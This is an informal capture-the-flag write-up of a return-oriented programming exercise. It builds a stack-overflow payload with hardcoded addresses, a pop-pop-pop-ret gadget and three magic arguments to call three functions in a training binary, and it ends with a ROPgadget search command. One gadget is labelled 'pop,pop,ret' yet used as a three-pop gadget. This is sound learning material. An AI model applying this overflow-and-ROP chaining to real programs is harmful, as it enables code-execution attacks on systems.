ok,lets go again bro

you must call the callme_one(),callme_two(),callme_tree() functions in that order with the arguments
1 - 0xdeadbeef
2- 0xcafebabe
3- 0xd00df00d 
to print flage! :D

then,until now,we maked this like that:
buf + call + ret + args

BUT,we need to pass three arguments for function one,two and three.

HOW TO MAKE THIS?

well, we will to find one "pop,pop,pop,ret" and you answer me,why?

because we need to arguments for the functions so that capture the flag!

buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab"
call_one = 0x080484f0 \xf0\x84\x04\x08
call_two =  0x08048550 - \x50\x85\x04\x08
call_three = 0x080484e0 - \xe0\x84\x04\x08
deadbeef = \xef\xbe\xad\xde
cafebabe = \xbe\xba\xfe\xca
d00df00d = \x0d\xf0\x0d\xd0
pop,pop,ret = 0x080487f9 - \xf9\x87\x04\x08

buf + call_one + 3pop ret + deadbeef + cafebabe + d00df00d +
call_two + 3pop ret + deadbeef + cafebabe + d00df00d +
call_three + 3pop ret + deadbeef + cafebabe + d00df00d +



Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab\xf0\x84\x04\x08\xf9\x87\x04\x08\xef\xbe\xad\xde\xbe\xba\xfe\xca\x0d\xf0\x0d\xd0\x50\x85\x04\x08\xf9\x87\x04\x08\xef\xbe\xad\xde\xbe\xba\xfe\xca\x0d\xf0\x0d\xd0\xe0\x84\x04\x08\xf9\x87\x04\x08\xef\xbe\xad\xde\xbe\xba\xfe\xca\x0d\xf0\x0d\xd0


python3 ROPgadget.py --binary ../Ctf\'s\ and\ Challenges/4/callme32 | grep "pop"  to find pop,pop,pop + ret


